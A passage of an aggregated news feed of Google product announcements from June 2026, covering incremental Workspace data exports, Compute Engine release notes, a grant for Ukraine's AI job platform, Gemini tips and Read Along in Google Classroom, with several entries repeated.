src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg2yfsbVCUG598Udv2pq8rd39eLjocnHD-OxXyhuyXtzOrB7HXTnEyqNsOl-ECulubijb3LAZrgt3pScCt2rJkTa9oFvBa5DCtJHK3MWX0ZGmA2HJeVWrGL0FZTeQ6A6DMBvHmosdeIFF1plsiqQI2ShGzHm5euA4YcU1aJ29HO4mo3jAyzkUgtJa8ZgI/s16000/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%201.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsbp1i6rZqqHUFCn-D1UBTiM-io11BNOXfmMKDMr1RkbgvspYtFDUqlLH4bjBco7RgybsRo_bKVEOmMnQZ87E4uGxBea6p5ky0VUwr3GyfuXTKT-Nrhed0-jcC32moGNrL8kpIu7qYzZBDNB4N5B-OhPkkotJIIBd6gUvHJo1Ow8e7URD7H7n3MFhFOc/s1060/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%202.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsbp1i6rZqqHUFCn-D1UBTiM-io11BNOXfmMKDMr1RkbgvspYtFDUqlLH4bjBco7RgybsRo_bKVEOmMnQZ87E4uGxBea6p5ky0VUwr3GyfuXTKT-Nrhed0-jcC32moGNrL8kpIu7qYzZBDNB4N5B-OhPkkotJIIBd6gUvHJo1Ow8e7URD7H7n3MFhFOc/s16000/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%202.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: Super Admins:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/a/answer/100458" target="_blank"&gt;exporting your organization’s data&lt;/a&gt; and &lt;a href="https://knowledge.workspace.google.com/p/incremental-data-export" target="_blank"&gt;incremental exports&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user impact or action required.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on June 24, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Plus customers with &lt;a href="https://support.google.com/a/answer/13880647" target="_blank"&gt;Assured Controls and Assured Controls Plus&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/incremental-data-export" target="_blank"&gt;Set up an incremental data export&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/migrate/export-all-your-organizations-data" target="_blank"&gt;Export all your organization's data&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-26T15:00:46+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html</id>
    <title>Streamline your data backups with incremental exports for Google Workspace</title>
    <updated>2026-06-26T15:00:46+00:00</updated>
    <content type="html">Google Workspace administrators can now utilize incremental exports when backing up organizational data. Instead of re-exporting their entire organization's data, admins can export frequent snapshots of their data into their organization’s own &lt;a href="https://cloud.google.com/storage/docs/buckets" target="_blank"&gt;Google Cloud Storage (GCS) bucket&lt;/a&gt;.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Key benefits include faster completion times, reduced Google Cloud Storage consumption and costs, and the ability to establish more frequent backup schedules to mitigate the risk of potential data loss.&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Specifically, admins can schedule automated exports for &lt;b&gt;Gmail, Drive, and Chat&lt;/b&gt;, with the flexibility to scope data by &lt;b&gt;organizational unit (OU), group, or specific users&lt;/b&gt;. They can initiate:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Periodic full backups - establishing a baseline snapshot through regular full exports&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Quarterly (every 3 months)&lt;/li&gt;&lt;li&gt;Semi-annually (every 6 months)&lt;/li&gt;&lt;li&gt;Annually (every year)&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Frequent incremental backups - supplementing the baseline with frequent incremental backups, such as backing up data from the "last x days" every "y days"&lt;/li&gt;&lt;ul&gt;&lt;li&gt;Capture data from the last 5 days, running every 3 days&lt;/li&gt;&lt;li&gt;Capture data from the last 7 days, running every 5 days&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg2yfsbVCUG598Udv2pq8rd39eLjocnHD-OxXyhuyXtzOrB7HXTnEyqNsOl-ECulubijb3LAZrgt3pScCt2rJkTa9oFvBa5DCtJHK3MWX0ZGmA2HJeVWrGL0FZTeQ6A6DMBvHmosdeIFF1plsiqQI2ShGzHm5euA4YcU1aJ29HO4mo3jAyzkUgtJa8ZgI/s1054/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%201.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg2yfsbVCUG598Udv2pq8rd39eLjocnHD-OxXyhuyXtzOrB7HXTnEyqNsOl-ECulubijb3LAZrgt3pScCt2rJkTa9oFvBa5DCtJHK3MWX0ZGmA2HJeVWrGL0FZTeQ6A6DMBvHmosdeIFF1plsiqQI2ShGzHm5euA4YcU1aJ29HO4mo3jAyzkUgtJa8ZgI/s16000/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%201.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsbp1i6rZqqHUFCn-D1UBTiM-io11BNOXfmMKDMr1RkbgvspYtFDUqlLH4bjBco7RgybsRo_bKVEOmMnQZ87E4uGxBea6p5ky0VUwr3GyfuXTKT-Nrhed0-jcC32moGNrL8kpIu7qYzZBDNB4N5B-OhPkkotJIIBd6gUvHJo1Ow8e7URD7H7n3MFhFOc/s1060/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%202.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivsbp1i6rZqqHUFCn-D1UBTiM-io11BNOXfmMKDMr1RkbgvspYtFDUqlLH4bjBco7RgybsRo_bKVEOmMnQZ87E4uGxBea6p5ky0VUwr3GyfuXTKT-Nrhed0-jcC32moGNrL8kpIu7qYzZBDNB4N5B-OhPkkotJIIBd6gUvHJo1Ow8e7URD7H7n3MFhFOc/s16000/Streamline%20your%20data%20backups%20with%20incremental%20exports%20for%20Google%20Workspace%20-%206604%20-%202.png" style="border: 2px solid rgb(0, 0, 0);" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: Super Admins:&lt;/b&gt; Visit the Help Center to learn more about &lt;a href="https://support.google.com/a/answer/100458" target="_blank"&gt;exporting your organization’s data&lt;/a&gt; and &lt;a href="https://knowledge.workspace.google.com/p/incremental-data-export" target="_blank"&gt;incremental exports&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; There is no end user impact or action required.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Extended rollout (potentially longer than 15 days for feature visibility) starting on June 24, 2026&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Plus customers with &lt;a href="https://support.google.com/a/answer/13880647" target="_blank"&gt;Assured Controls and Assured Controls Plus&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/p/incremental-data-export" target="_blank"&gt;Set up an incremental data export&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/migrate/export-all-your-organizations-data" target="_blank"&gt;Export all your organization's data&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/streamline-your-data-backups-with-incremental-exports-for-Google-Workspace.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-26T15:00:46+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_26_2026</id>
    <title>Cloud Release Notes — June 26, 2026</title>
    <updated>2026-06-26T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Compute Engine&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally available&lt;/strong&gt;: You can cancel a future reservation request in calendar
mode to prevent Compute Engine from provisioning your requested resources and
incurring unnecessary charges. For more information, see
&lt;a href="https://docs.cloud.google.com/compute/docs/instances/delete-future-reservations-calendar-mode"&gt;Delete a future reservation request in calendar mode&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Generally available&lt;/strong&gt;: In a managed instance group (MIG), you can use a health
check to monitor your application health without triggering repairs for an
unhealthy VM, if the application fails the health check. You can prevent the MIG
from repairing an unhealthy VM by turning off autohealing. For more information,
see &lt;a href="https://docs.cloud.google.com/compute/docs/instance-groups/turn-off-vm-repairs-in-mig"&gt;Turn off repairs in a MIG&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_26_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-26T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/investing-in-ukraines-ai-leadership-and-economic-future</id>
    <title>Investing in Ukraine’s AI leadership and economic future</title>
    <updated>2026-06-25T17:40:00+00:00</updated>
    <content type="html">Google.org is providing a $5 million grant to scale Obrii, Ukraine’s national AI job platform. This contributes to Ukraine's AI adoption, following sustained investment …</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/investing-in-ukraines-ai-leadership-and-economic-future" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:40:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/inside-google/around-the-globe/google-europe/investing-in-ukraines-ai-leadership-and-economic-future/</id>
    <title>Investing in Ukraine’s AI leadership and economic future</title>
    <updated>2026-06-25T17:40:00+00:00</updated>
    <content type="html">Google.org is providing a $5 million grant to scale Obrii, Ukraine’s national AI job platform. This contributes to Ukraine's AI adoption, following sustained investment …</content>
    <link href="https://blog.google/company-news/inside-google/around-the-globe/google-europe/investing-in-ukraines-ai-leadership-and-economic-future/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:40:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/najnowsze-aktualizacje-uslugi-google-finance-i-nowa-aplikacja</id>
    <title>Najnowsze aktualizacje usługi Google Finance i nowa aplikacja</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">Nowe aktualizacje w Google Finance</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/najnowsze-aktualizacje-uslugi-google-finance-i-nowa-aplikacja" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/iste-2026-educator-updates</id>
    <title>Building AI tailored for education, with educators in the lead</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">A graphic featuring the Gemini logo surrounded by icons representing educational tools, including Guided Learning, Study Notebooks, and NotebookLM, set against a background featuring a security shield and classroom imagery.</content>
    <link href="https://blog.google/products-and-platforms/products/education/iste-2026-educator-updates" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/gemini-tips-for-parents</id>
    <title>5 ways Google parents are using Gemini</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">Colorful illustration of two happy parents with a smiling child and toddler.</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/gemini-tips-for-parents" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/find-job-with-google-ai-tools</id>
    <title>Try these 3 Google AI tools to help find your next job.</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Google_AI_Tools_CC_social.max-600x600.format-webp.webp" /&gt;Use Google AI tools — like Career Dreamer, NotebookLM and Gemini Live — for resumes, cover letters, interview prep and more.</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/find-job-with-google-ai-tools" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/gemini-tips-for-parents/</id>
    <title>5 ways Google parents are using Gemini</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">Colorful illustration of two happy parents with a smiling child and toddler.</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/gemini-tips-for-parents/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/najnowsze-aktualizacje-uslugi-google-finance-i-nowa-aplikacja/</id>
    <title>Najnowsze aktualizacje usługi Google Finance i nowa aplikacja</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">Nowe aktualizacje w Google Finance</content>
    <link href="https://blog.google/intl/pl-pl/nowosci-produktowe/odkrywanie-wyszukiwanie/najnowsze-aktualizacje-uslugi-google-finance-i-nowa-aplikacja/" rel="alternate"/>
    <category term="Google Poland"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/iste-2026-educator-updates/</id>
    <title>Building AI tailored for education, with educators in the lead</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">A graphic featuring the Gemini logo surrounded by icons representing educational tools, including Guided Learning, Study Notebooks, and NotebookLM, set against a background featuring a security shield and classroom imagery.</content>
    <link href="https://blog.google/products-and-platforms/products/education/iste-2026-educator-updates/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/gemini/find-job-with-google-ai-tools/</id>
    <title>Try these 3 Google AI tools to help find your next job.</title>
    <updated>2026-06-25T17:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Google_AI_Tools_CC_social.max-600x600.format-webp.webp" /&gt;Job hunting can be a slog. But with a few Google AI tools, you can simplify the process from start to finish.Career Dreamer: The first step in landing a job is finding o…</content>
    <link href="https://blog.google/products-and-platforms/products/gemini/find-job-with-google-ai-tools/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html</id>
    <title>Read Along in Google Classroom is now available to all education users to support foundational literacy</title>
    <updated>2026-06-25T16:58:19+00:00</updated>
    <content type="html">Read Along in Google Classroom, an AI-powered literacy tool that provides in-the-moment support to students as they read aloud,  is now available to all Google Workspace for Education users at no cost. We believe this will open access to literacy tools for millions of students, and help educators and education leaders achieve better learning outcomes and progress on foundational literacy.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Read Along is designed to build students' speaking, listening, and decoding skills. It offers flexible learning modes, allowing students to practice aloud with real-time feedback, listen to stories, or enjoy books independently. To help emerging students transition from simply "learning to read" to "reading to learn," Read Along includes questions directly in the material to continuously strengthen comprehension as well as decoding support through word-breakdown.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Educators can use Read Along in Google Classroom to provide personalized reading practice for every student. The insights dashboard showing individual student and class-wide progress can help inform instruction and make it easier to create tailored reading activities based on student needs.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;With this update, all Google Workspace for Education users will have access to:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;A tailored reading experience in Google Classroom: &lt;/b&gt;Educators can easily create interactive reading activities right &lt;a href="https://support.google.com/edu/classroom/answer/14174515?hl=en-GB" target="_blank"&gt;within Classroom&lt;/a&gt;, giving students in-the-moment support while getting actionable insights related to their reading skills.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Real-time reading support: &lt;/b&gt;Learners get help with pronunciation as they read aloud and get word breakdown support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Class and student insights to inform instruction: &lt;/b&gt; View information on accuracy, speed, comprehension, phonics skills, and progress for individual students and the entire class.&lt;/li&gt;&lt;li&gt;&lt;b&gt;An extensive content library:&lt;/b&gt; Choose from over hundreds of books across eight languages: English, Spanish, Portuguese, Urdu, Arabic, Thai, Indonesian, and Malay. This includes content such as Heggerty decodables, ReadWorks articles for higher-grade learners, and localized publisher titles like Turma da Mônica in Brazil.&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Multilingual support: &lt;/b&gt;For students learning English, the reading buddy can provide real-time support in both English and their native language so they can practice their vocabulary. Native language support is available in Spanish, Portuguese, Urdu, Arabic, Indonesian, and Malay.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Story creation with Gemini: &lt;/b&gt;With help from Gemini, educators can create differentiated reading activities tailored to phonics skills needing practice, specific topics, and reading levels.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Existing content: &lt;/b&gt;Add existing class content to better tailor real-time student support and insights with Read Along.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Advanced analytics, like viewing student’s progress over time or across assignments and the ability to extract data via BigQuery, are only available with Education Plus and Teaching &amp;amp; Learning add-on.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt;&amp;nbsp;If you became a Google Workspace for Education customer on or after July 7, 2024, Read Along will be ON by default. If you became a Google Workspace for Education customer before July 7, 2024, you’ll need to enabled Read Along in the Admin console. Read Along can be disabled at the domain and OU level. It can be enabled at the group level even if it is disabled at the OU level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-read-along-on-or-off-for-users" target="_blank"&gt;learn more about turning Read Along on or off for users&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/edu/classroom/answer/14174515" target="_blank"&gt;learn more about Read Along in Classroom&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Rolling out now, with expected completion by July 3, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Fundamentals, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education; Teaching and Learning; Endpoint Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Nonprofits&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-read-along-on-or-off-for-users" target="_blank"&gt;Turn Read Along on or off for users&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Classroom Help: &lt;a href="https://support.google.com/edu/classroom/answer/14174515" target="_blank"&gt;Read Along in Google Classroom&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-25T16:58:19+00:00</published>
  </entry>
  <entry>
    <id>http://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html</id>
    <title>Read Along in Google Classroom is now available to all education users to support foundational literacy</title>
    <updated>2026-06-25T16:58:19+00:00</updated>
    <content type="html">Read Along in Google Classroom, an AI-powered literacy tool that provides in-the-moment support to students as they read aloud,  is now available to all Google Workspace for Education users at no cost. We believe this will open access to literacy tools for millions of students, and help educators and education leaders achieve better learning outcomes and progress on foundational literacy.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Read Along is designed to build students' speaking, listening, and decoding skills. It offers flexible learning modes, allowing students to practice aloud with real-time feedback, listen to stories, or enjoy books independently. To help emerging students transition from simply "learning to read" to "reading to learn," Read Along includes questions directly in the material to continuously strengthen comprehension as well as decoding support through word-breakdown.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Educators can use Read Along in Google Classroom to provide personalized reading practice for every student. The insights dashboard showing individual student and class-wide progress can help inform instruction and make it easier to create tailored reading activities based on student needs.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;With this update, all Google Workspace for Education users will have access to:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;A tailored reading experience in Google Classroom: &lt;/b&gt;Educators can easily create interactive reading activities right &lt;a href="https://support.google.com/edu/classroom/answer/14174515?hl=en-GB" target="_blank"&gt;within Classroom&lt;/a&gt;, giving students in-the-moment support while getting actionable insights related to their reading skills.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Real-time reading support: &lt;/b&gt;Learners get help with pronunciation as they read aloud and get word breakdown support.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Class and student insights to inform instruction: &lt;/b&gt; View information on accuracy, speed, comprehension, phonics skills, and progress for individual students and the entire class.&lt;/li&gt;&lt;li&gt;&lt;b&gt;An extensive content library:&lt;/b&gt; Choose from over hundreds of books across eight languages: English, Spanish, Portuguese, Urdu, Arabic, Thai, Indonesian, and Malay. This includes content such as Heggerty decodables, ReadWorks articles for higher-grade learners, and localized publisher titles like Turma da Mônica in Brazil.&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;b&gt;Multilingual support: &lt;/b&gt;For students learning English, the reading buddy can provide real-time support in both English and their native language so they can practice their vocabulary. Native language support is available in Spanish, Portuguese, Urdu, Arabic, Indonesian, and Malay.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Story creation with Gemini: &lt;/b&gt;With help from Gemini, educators can create differentiated reading activities tailored to phonics skills needing practice, specific topics, and reading levels.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Existing content: &lt;/b&gt;Add existing class content to better tailor real-time student support and insights with Read Along.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Advanced analytics, like viewing student’s progress over time or across assignments and the ability to extract data via BigQuery, are only available with Education Plus and Teaching &amp;amp; Learning add-on.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; Read Along will be available by default and can be disabled at the domain and OU level. It can be enabled at the group level even if it is disabled at the OU level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-read-along-on-or-off-for-users" target="_blank"&gt;learn more about turning Read Along on or off for users&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/edu/classroom/answer/14174515" target="_blank"&gt;learn more about Read Along in Classroom&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release and Scheduled Release domains:&lt;/a&gt; Rolling out now, with expected completion by July 3, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Fundamentals, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education; Teaching and Learning; Endpoint Education&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Nonprofits&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;div&gt;&lt;ul style="text-align: 